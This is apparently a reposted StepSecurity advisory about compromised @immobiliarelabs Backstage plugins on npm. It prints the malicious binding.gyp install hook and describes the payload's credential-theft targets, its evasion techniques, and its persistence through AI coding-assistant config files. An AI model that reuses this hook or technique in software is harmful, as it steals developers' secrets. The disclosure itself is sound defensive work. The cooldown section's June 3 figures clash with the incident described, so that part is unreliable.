惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

月光博客
月光博客
Cyberwarzone
Cyberwarzone
L
LINUX DO - 最新话题
N
News and Events Feed by Topic
T
Troy Hunt's Blog
Help Net Security
Help Net Security
S
Security @ Cisco Blogs
Google DeepMind News
Google DeepMind News
Security Archives - TechRepublic
Security Archives - TechRepublic
M
MIT News - Artificial intelligence
G
Google Developers Blog
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
V2EX - 技术
V2EX - 技术
Y
Y Combinator Blog
D
Darknet – Hacking Tools, Hacker News & Cyber Security
大猫的无限游戏
大猫的无限游戏
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
Microsoft Security Blog
Microsoft Security Blog
Cisco Talos Blog
Cisco Talos Blog
T
Threatpost
Recent Commits to openclaw:main
Recent Commits to openclaw:main
S
SegmentFault 最新的问题
I
InfoQ
H
Hacker News: Front Page
D
Docker
Scott Helme
Scott Helme
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
Blog — PlanetScale
Blog — PlanetScale
人人都是产品经理
人人都是产品经理
博客园 - 叶小钗
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
N
Netflix TechBlog - Medium
AWS News Blog
AWS News Blog
Know Your Adversary
Know Your Adversary
博客园 - 【当耐特】
T
Tor Project blog
U
Unit 42
H
Heimdal Security Blog
Microsoft Azure Blog
Microsoft Azure Blog
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
P
Privacy & Cybersecurity Law Blog
PCI Perspectives
PCI Perspectives
美团技术团队
O
OpenAI News
T
Tailwind CSS Blog
H
Hackread – Cybersecurity News, Data Breaches, AI and More
B
Blog
GbyAI
GbyAI
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
MyScale Blog
MyScale Blog

Step Security Blog

Securing Vibe Coding and AI Coding Agents: An End-to-End Approach with StepSecurity - StepSecurity Introducing StepSecurity Dev Machine Guard: Protecting Developer Machines from Supply Chain Attacks - StepSecurity Top 2024 Predictions for CI/CD Security - StepSecurity Dev Machine Guard Is Now Open Source: See What's Really Running on Your Developer Machine - StepSecurity Datadog's DevSecOps 2026 Report Validates What We've Been Building - StepSecurity hackerbot-claw: An AI-Powered Bot Actively Exploiting GitHub Actions - Microsoft, DataDog, and CNCF Projects Hit So Far - StepSecurity Cline Supply Chain Attack Detected: cline@2.3.0 Silently Installs OpenClaw - StepSecurity StepSecurity’s Unified Protection Across the SDLC Infrastructure Threat Framework (SITF) - StepSecurity @velora-dex/sdk Compromised on npm: Malicious Version Drops macOS Backdoor via launchctl Persistence - StepSecurity axios Compromised on npm - Malicious Versions Drop Remote Access Trojan - StepSecurity Behind the Scenes: How StepSecurity Detected and Helped Remediate the Largest npm Supply Chain Attack - StepSecurity 10 Layers Deep: How StepSecurity Stops TeamPCP's Trivy Supply Chain Attack on GitHub Actions - StepSecurity Malicious IoliteLabs VSCode Extensions Target Solidity Developers on Windows, macOS, and Linux with Backdoor - StepSecurity TeamPCP Plants WAV Steganography Credential Stealer in telnyx PyPI Package - StepSecurity litellm: Credential Stealer Hidden in PyPI Wheel - StepSecurity Checkmarx KICS GitHub Action Compromised: Malware Injected in All Git Tags - StepSecurity CanisterWorm: How a Self-Propagating npm Worm Is Spreading Backdoors Across the Ecosystem - StepSecurity Trivy Compromised a Second Time - Malicious v0.69.4 Release, aquasecurity/setup-trivy, aquasecurity/trivy-action GitHub Actions Compromised - StepSecurity bittensor-wallet 4.0.2 Compromised on PyPI - Backdoor Exfiltrates Private Keys - StepSecurity Malicious npm Releases Found in Popular React Native Packages - 130K+ Monthly Downloads Compromised - StepSecurity Malicious Polymarket Bot Hides in Hijacked dev-protocol GitHub Org and Steals Wallet Keys - StepSecurity ForceMemo: Hundreds of GitHub Python Repos Compromised via Account Takeover and Force-Push - StepSecurity xygeni-action Compromised: C2 Reverse Shell Backdoor Injected via Tag Poisoning - StepSecurity kubernetes-el Compromised: How a Pwn Request Exploited a Popular Emacs Package - StepSecurity How StepSecurity Caught a Release Storm in Microsoft’s @types Packages - StepSecurity Harden Runner Now Supports Windows and macOS GitHub Actions Runners - StepSecurity 10,000 Open-Source Projects Now Secured by Harden-Runner Community-Tier: A Milestone Three Years in the Making - StepSecurity 20+ Popular NPM Packages Compromised (Chalk, Debug, Strip-ANSI, Color-Convert, Wrap-ANSI...) - StepSecurity 2024 in Review: The Evolution of CI/CD Security & What's Next - StepSecurity How to Use Docker in Actions Runner Controller (ARC) Runners Securely - StepSecurity Celebrating 1000 Repositories Secured with Harden Runner: A Journey of Growth and Collaboration - StepSecurity StepSecurity Detects Early Supply Chain Risk Signals in kilocode npm - StepSecurity Another npm Supply Chain Attack: The 'is' Package Compromise - StepSecurity anthropics/claude-code-action Security: How to Secure Claude Code in GitHub Actions with Harden-Runner - StepSecurity Harden-Runner detection: tj-actions/changed-files action is compromised - StepSecurity StepSecurity's Catalog of Fixes - StepSecurity Orchestrating Security: StepSecurity's Impact on 400+ Repositories and Future Plans - StepSecurity Announcing Anomalous Outbound Call Detection Using Machine Learning - StepSecurity Announcing GitHub Actions Advisor and StepSecurity Maintained Actions - StepSecurity Analysis of Backdoored XZ Utils Build Process with Harden-Runner - StepSecurity Announcing General Availability of Harden Runner - StepSecurity Milestone Achieved: 2500+ Public Repositories Secured with Harden-Runner - StepSecurity Build secretless CI/CD pipelines using wait-for-secrets - StepSecurity Introducing Apps & PATs: Centralized Visibility for GitHub Apps and Personal Access Tokens - StepSecurity CVE-2026-22709: Critical Sandbox Escape Vulnerability in vm2 - StepSecurity StepSecurity Now Supports Dark Mode - StepSecurity 2025 in Review: The Evolution of Supply Chain Security & What's Next - StepSecurity Bake Harden-Runner Into GitHub's Custom Runner Images for Organization-Wide CI/CD Security - StepSecurity StepSecurity Is Now Available on Azure Marketplace - StepSecurity Critical Remote Code Execution Vulnerabilities Discovered in React Server Components and Next.js - StepSecurity How Harden Runner Detected the Sha1-Hulud Supply Chain Attack in CNCF's Backstage Repository - StepSecurity Sha1-Hulud: The Second Coming - Zapier, ENS Domains, and Other Prominent NPM Packages Compromised - StepSecurity Supply Chain Security Alert: eslint-config-prettier Package Shows Signs of Compromise - StepSecurity 9,000 Open-Source Projects Now Secured by Harden-Runner - StepSecurity Shai-Hulud: Self-Replicating Worm Compromises 500+ NPM Packages - StepSecurity Introducing npm Package Search: Find Where Any Package Was Introduced Across Your GitHub Organizations - StepSecurity StepSecurity Is Sponsoring GitHub Universe 2025 - StepSecurity s1ngularity: Popular Nx Build System Package Compromised with Data-Stealing Malware - StepSecurity Introducing StepSecurity Threat Intelligence: Real-Time Supply Chain Attack Alerts for Your SIEM - StepSecurity 8,000 Strong: Harden-Runner's Growing Impact on CI/CD Security - StepSecurity Securing Google Gemini in GitHub Actions with Harden-Runner - StepSecurity GhostAction Campaign: Over 3,000 Secrets Stolen Through Malicious GitHub Workflows - StepSecurity Introducing the NPM Package Cooldown Check - StepSecurity Securing GitHub Copilot in GitHub Actions with Harden-Runner - StepSecurity Calculate Your CI/CD Security ROI with StepSecurity's New ROI Calculator - StepSecurity How StepSecurity Harden Runner Detected Unexpected Microsoft Defender Installation on GitHub-hosted Ubuntu Runners - StepSecurity StepSecurity Harden Runner: Detect source code tampering during the build process - StepSecurity Suspicious Tag Movement in AWS’s GitHub Action: What Happened and Why It Matters - StepSecurity When 'Changed Files' Changed Everything: Our Black Hat 2025 Presentation on the tj-actions Supply Chain Breach - StepSecurity Lessons from AWS CodeBuild’s Memory-Dump Incident (CVE-2025-8217) - StepSecurity Supply Chain Security Alert: num2words PyPI Package Shows Signs of Compromise - StepSecurity When AI Meets CI/CD: Coding Agents in GitHub Actions Pose Hidden Security Risks - StepSecurity The GitHub Warning Everyone Ignores: 'This Commit Does Not Belong to Any Branch' - StepSecurity 8 GitHub Actions Secrets Management Best Practices to Follow - StepSecurity reviewdog GitHub Actions are compromised - StepSecurity 7,000 Open-Source Projects Now Secured by Harden-Runner - StepSecurity Replace Third-Party Actions with StepSecurity Maintained Actions via Automated Pull Requests - StepSecurity StepSecurity Is Now Available on AWS Marketplace - StepSecurity Introducing StepSecurity Artifact Monitor: Detect Unauthorized Software Releases in minutes, not months - StepSecurity Introducing Workflow Run Policies: Guardrails for Blocking Non-Compliant GitHub Actions Runs - StepSecurity Harden-Runner Detects New Traffic to release-assets.githubusercontent.com Across Multiple Customers - StepSecurity Grafana GitHub Actions Security Incident - StepSecurity Export Harden-Runner Security Insights and Detections to Amazon S3 - StepSecurity Evolving Harden-Runner’s disable-sudo Policy for Improved Runner Security - StepSecurity Announcing Policy-Driven Automated Pull Requests for CI/CD Misconfiguration Remediation - StepSecurity Announcing StepSecurity’s Integration with RunsOn: Secure and Optimized CI/CD Pipelines - StepSecurity Secure Repo Just Got Better: New Features for GitHub Actions Security Best Practices - StepSecurity Why Compliance Auditors Are Looking at Your CI/CD Runners - And How to Prepare - StepSecurity Harden-Runner Flags Anomalous Outbound Call, Leading to Docker Documentation Update - StepSecurity StepSecurity Harden-Runner Now Secures GitHub Actions Workflows for Over 5,000 Open Source Projects - StepSecurity GitHub Actions Pwn Request Vulnerability - StepSecurity Prevent Ultralytics Style CI/CD Security Attacks with Network Security Controls - StepSecurity PyTorch Supply Chain Compromise - StepSecurity Unified Network Egress View: Centralize GitHub Actions Network Destinations for Your Enterprise - StepSecurity Uniting Developers and Security: Celebrating the Success of 500+ Open Source Projects Using StepSecurity's Orchestration Platform - StepSecurity 5 Effective Third-Party GitHub Actions Governance Best Practices - StepSecurity StepSecurity Recognized Among CRN’s "10 Hottest DevOps Startups Of 2024" - StepSecurity Streamline Your GitHub Actions Workflows with StepSecurity’s Latest Feature - StepSecurity StepSecurity Steps Up the Security Game with SOC 2 Type 2 Compliance - StepSecurity StepSecurity's Alignment with CISA's CI/CD Security Guidance - StepSecurity
Multiple @immobiliarelabs Backstage Plugins Compromised on npm - StepSecurity
2026-06-27 · via Step Security Blog

On June 26, 2026, multiple versions across several npm packages maintained by Immobiliare Labs were found to carry a malicious payload that fires at npm install time via a binding.gyp node-gyp hook. The affected packages are @immobiliarelabs/backstage-plugin-gitlab, @immobiliarelabs/backstage-plugin-gitlab-backend, @immobiliarelabs/backstage-plugin-ldap-auth, and @immobiliarelabs/backstage-plugin-ldap-auth-backend. The payload steals credentials from a broad range of sources including GitHub Actions secrets, cloud provider credentials, and package registry tokens, and it attempts to persist inside AI coding assistant configurations.

We downloaded and statically analyzed the tarball for @immobiliarelabs/backstage-plugin-gitlab version 2.1.2 and compared it against the prior clean release 2.1.1. The compromised versions each include a 5 MB index.js that was absent from all prior releases, along with a new binding.gyp that causes node-gyp to execute the payload during installation. Technical analysis of the full payload is ongoing and this post will be updated as additional details become available.

Affected Versions

Package Compromised Version
@immobiliarelabs/backstage-plugin-gitlab 1.0.1
@immobiliarelabs/backstage-plugin-gitlab 2.1.2
@immobiliarelabs/backstage-plugin-gitlab 3.0.3
@immobiliarelabs/backstage-plugin-gitlab 4.0.2
@immobiliarelabs/backstage-plugin-gitlab 5.2.1
@immobiliarelabs/backstage-plugin-gitlab 6.13.1
@immobiliarelabs/backstage-plugin-gitlab 7.0.2
@immobiliarelabs/backstage-plugin-gitlab-backend 3.0.3
@immobiliarelabs/backstage-plugin-gitlab-backend 4.0.2
@immobiliarelabs/backstage-plugin-gitlab-backend 5.2.1
@immobiliarelabs/backstage-plugin-gitlab-backend 6.13.1
@immobiliarelabs/backstage-plugin-gitlab-backend 7.0.2
@immobiliarelabs/backstage-plugin-ldap-auth 1.1.4
@immobiliarelabs/backstage-plugin-ldap-auth 2.0.5
@immobiliarelabs/backstage-plugin-ldap-auth 3.0.2
@immobiliarelabs/backstage-plugin-ldap-auth 4.3.2
@immobiliarelabs/backstage-plugin-ldap-auth 5.2.1
@immobiliarelabs/backstage-plugin-ldap-auth-backend 1.1.3
@immobiliarelabs/backstage-plugin-ldap-auth-backend 2.0.5
@immobiliarelabs/backstage-plugin-ldap-auth-backend 3.0.2
@immobiliarelabs/backstage-plugin-ldap-auth-backend 4.3.2
@immobiliarelabs/backstage-plugin-ldap-auth-backend 5.2.1

All compromised versions were published within a 30-second window on June 26, 2026, inserted as new patch releases into every supported major release series simultaneously. The payload bypasses postinstall script detection by using a binding.gyp file to execute node index.js through node-gyp's shell expansion, a technique that is not caught by tools that only monitor scripts.postinstall in package.json.

We reported these findings to the Immobiliare Labs team via GitHub issue #1052 in the immobiliare/backstage-plugin-gitlab repository on June 26, 2026, the same day the compromised versions were identified.

Connection to the Miasma Campaign

This attack follows the same pattern as the mass supply chain attack on leo-platform packages previously documented by StepSecurity, where multiple patch versions were simultaneously published across every supported release series. For a deep technical walkthrough of the binding.gyp execution technique, Bun-based evasion, and the worm propagation mechanism, see our detailed analysis of the Miasma campaign.

Background: What Are These Packages?

All four affected packages are open-source Backstage plugins maintained by Immobiliare Labs, the Italian real estate company. The GitLab plugins integrate GitLab data into the Backstage internal developer portal, displaying merge requests, pipelines, contributors, and related GitLab metadata. The LDAP auth plugins provide LDAP-based authentication for Backstage, used by organizations running internal LDAP or Active Directory. All packages are used by platform engineering teams running self-hosted Backstage instances and have been published on npm since late 2022.

The Entry Point: binding.gyp Hook

Each compromised version includes two files not present in prior releases: a 5 MB index.js and a binding.gyp native addon manifest. The binding.gyp file contains the following target definition:

{
  "targets": [
    {
      "target_name": "Setup",
      "type": "none",
      "sources": ["<!(node index.js > /dev/null 2>&1 && echo stub.c)"]
    }
  ]
}

Payload Overview

The 5 MB index.js payload uses three layers of obfuscation:

  1. ROT-2 Caesar cipher applied to all alphabetic characters, wrapping the entire payload string in a try { eval(...) } block.
  2. AES-128-GCM decryption of two embedded ciphertext blobs using hardcoded keys. The first blob (_b) decrypts to a Bun runtime downloader. The second blob (_p) decrypts to the main obfuscator.io-obfuscated credential harvesting payload.
  3. obfuscator.io string table rotation applied to the main payload, with a secondary encryption layer on the most sensitive strings.

After decryption, the outer wrapper downloads the Bun JavaScript runtime from the official GitHub releases endpoint (https://github.com/oven-sh/bun/releases/download/bun-v1.3.13/), writes the decrypted main payload to a randomly named temporary file, executes it using Bun, and deletes the file. Using Bun rather than Node.js is a deliberate evasion technique: Bun does not support the --require hook interception used by many Node.js security monitoring tools.

Credential Harvesting Targets

Static analysis of the decoded payload string table reveals credential theft targeting the following sources:

  • GitHub tokens (personal access tokens, GitHub App JWTs, OIDC tokens, runner tokens)
  • GitHub Actions masked secrets via /proc/<pid>/mem read of the Runner.Worker process
  • AWS credentials (environment variables, IMDS at 169.254.169.254, ECS task metadata at 169.254.170.2, SSM Parameter Store, Secrets Manager)
  • Google Cloud Platform service account credentials
  • Azure managed identity, service principal, and Key Vault credentials
  • Kubernetes service account tokens and namespace secrets
  • HashiCorp Vault tokens (file paths /home/runner/.vault-token, /root/.vault-token, /run/secrets/VAULT_TOKEN)
  • npm, PyPI, RubyGems, and JFrog Artifactory tokens
  • Password manager databases (Bitwarden, 1Password, gopass)
  • SSH keys (.ssh/)

AI Coding Assistant Persistence

The payload includes a function named infectHost that targets configuration files for multiple AI coding assistants:

  • Claude Code: writes to .claude/settings.json using the SessionStart hook to execute code on every session start
  • GitHub Copilot: modifies .github/copilot-instructions.md
  • Cursor: writes to .cursor/rules/
  • VS Code: injects into .vscode/tasks.json using the folderOpen trigger
  • Aider: modifies .aider.conf.yml
  • Amazon Kiro, Sourcegraph Cody, Google Gemini, OpenAI Codex

Supply Chain Worm Capability

The payload contains functions including squatPackage, updateTarball, handleNpmTokens, and handlePypiTokens that suggest the ability to publish modified packages to npm and PyPI using stolen registry credentials. This is consistent with self-propagating supply chain worm behavior observed in prior campaigns.

Indicators of Compromise

Type Value Significance
Malicious package @immobiliarelabs/backstage-plugin-gitlab@1.0.1 Presence confirms compromised version installed
Malicious package @immobiliarelabs/backstage-plugin-gitlab@2.1.2 Presence confirms compromised version installed
Malicious package @immobiliarelabs/backstage-plugin-gitlab@3.0.3 Presence confirms compromised version installed
Malicious package @immobiliarelabs/backstage-plugin-gitlab@4.0.2 Presence confirms compromised version installed
Malicious package @immobiliarelabs/backstage-plugin-gitlab@5.2.1 Presence confirms compromised version installed
Malicious package @immobiliarelabs/backstage-plugin-gitlab@6.13.1 Presence confirms compromised version installed
Malicious package @immobiliarelabs/backstage-plugin-gitlab@7.0.2 Presence confirms compromised version installed
Malicious package @immobiliarelabs/backstage-plugin-gitlab-backend@3.0.3 Presence confirms compromised version installed
Malicious package @immobiliarelabs/backstage-plugin-gitlab-backend@4.0.2 Presence confirms compromised version installed
Malicious package @immobiliarelabs/backstage-plugin-gitlab-backend@5.2.1 Presence confirms compromised version installed
Malicious package @immobiliarelabs/backstage-plugin-gitlab-backend@6.13.1 Presence confirms compromised version installed
Malicious package @immobiliarelabs/backstage-plugin-gitlab-backend@7.0.2 Presence confirms compromised version installed
File hash (SHA512) sha512-k7pGY+wScfqX51fpF412dOze6kSIytHYwZAXPhu6pDV+R7JWnD98Uc0nzGVHFead99nwWU4x56fkre/jH3Q7Xg== Integrity hash of gitlab@2.1.2 tarball from npm registry
Malicious file index.js (5.0 MB) in package root Present in compromised versions only; absent from all prior releases
Malicious file binding.gyp in package root Present in compromised versions only; triggers payload execution via node-gyp
Download URL https://github.com/oven-sh/bun/releases/download/bun-v1.3.13/bun-<os>-<arch>.zip Bun runtime fetched by payload; outbound connection during install confirms execution
Persistence path .claude/settings.json Modified to add SessionStart hook for IDE persistence
Persistence path .github/copilot-instructions.md Modified by infectHost function
Persistence path .cursor/rules/setup.mdc Modified by infectHost function
Persistence path .vscode/tasks.json Modified to trigger on folderOpen event

For StepSecurity Customers

Threat Center Alert

StepSecurity has published a threat intel alert in the Threat Center with all relevant links to check if your organization is affected. The alert includes the full attack summary, technical analysis of the Phantom Gyp technique, IOCs, all affected packages and malicious versions, and remediation steps, so teams have everything needed to triage and respond immediately. Threat Center alerts are delivered directly into existing SIEM workflows for real-time visibility.

Harden-Runner

Harden-Runner is a purpose-built security agent for CI/CD runners. It monitors all network events, process executions, file access, and outbound network connections at the step level in GitHub Actions, providing full runtime visibility into what happens during every workflow step, including npm install.

Harden-Runner detects the anomalous process chain (node-gyp spawning curl, unzip, and bun) and the unauthorized memory read, immediately initiating lockdown mode. The workflow run is terminated, preventing any secrets from being extracted.

Link to the run : https://app.stepsecurity.io/github/actions-security-demo/test-comp/actions/runs/28249315973

Secure Registry

StepSecurity Secure Registry provides each enterprise customer with a dedicated, policy-enforced npm registry that sits between your existing package manager (such as JFrog Artifactory) and the public npm registry. Instead of fetching packages directly from registry.npmjs.org, your infrastructure routes requests through your StepSecurity registry, which applies configurable security policies before serving any package.

The primary defense here is the cooldown period. Newly published package versions are held for a configurable window before being served to any developer machine or CI/CD pipeline. When the compromised Miasma packages were published to npm, including @vapi-ai/server-sdk, ai-sdk-ollama, and dozens of packages in the jagreehal ecosystem, Secure Registry customers were never exposed.

Detect Compromised Developer Machines

StepSecurity Dev Machine Guard gives security teams real-time visibility into npm packages installed across every enrolled developer device. When a malicious package is identified, teams can immediately search by package name and version to discover all impacted machines.

npm Package Cooldown Check

Newly published npm packages are temporarily blocked during a configurable cooldown window. When a PR introduces or updates to a recently published version, the check automatically fails. Since most malicious packages are identified within hours, this creates a crucial safety buffer. In this case, 57 packages across 286+ malicious versions were published in a rolling campaign lasting under two hours on June 3, so any PR updating to an affected version during the cooldown period would have been blocked automatically.

npm Package Compromised Updates Check

StepSecurity maintains a real-time database of known malicious and high-risk npm packages, updated continuously, often before official CVEs are filed. If a PR attempts to introduce a compromised package, the check fails and the merge is blocked. All compromised versions from this Miasma campaign, including @vapi-ai/server-sdk, ai-sdk-ollama, and the full jagreehal package family, were added to this database within minutes of detection.

npm Package Search

Search across all PRs in all repositories across your organization to find where a specific package was introduced. When a compromised package is discovered, instantly understand the blast radius: which repos, which PRs, and which teams are affected. This works across pull requests, default branches, and dev machines.